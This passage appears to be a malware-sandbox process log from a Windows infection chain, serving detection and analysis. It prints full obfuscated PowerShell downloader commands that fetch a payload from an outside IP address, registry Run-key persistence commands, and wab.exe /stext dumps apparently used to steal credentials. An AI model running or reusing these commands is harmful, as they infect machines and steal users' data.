            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeIJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x 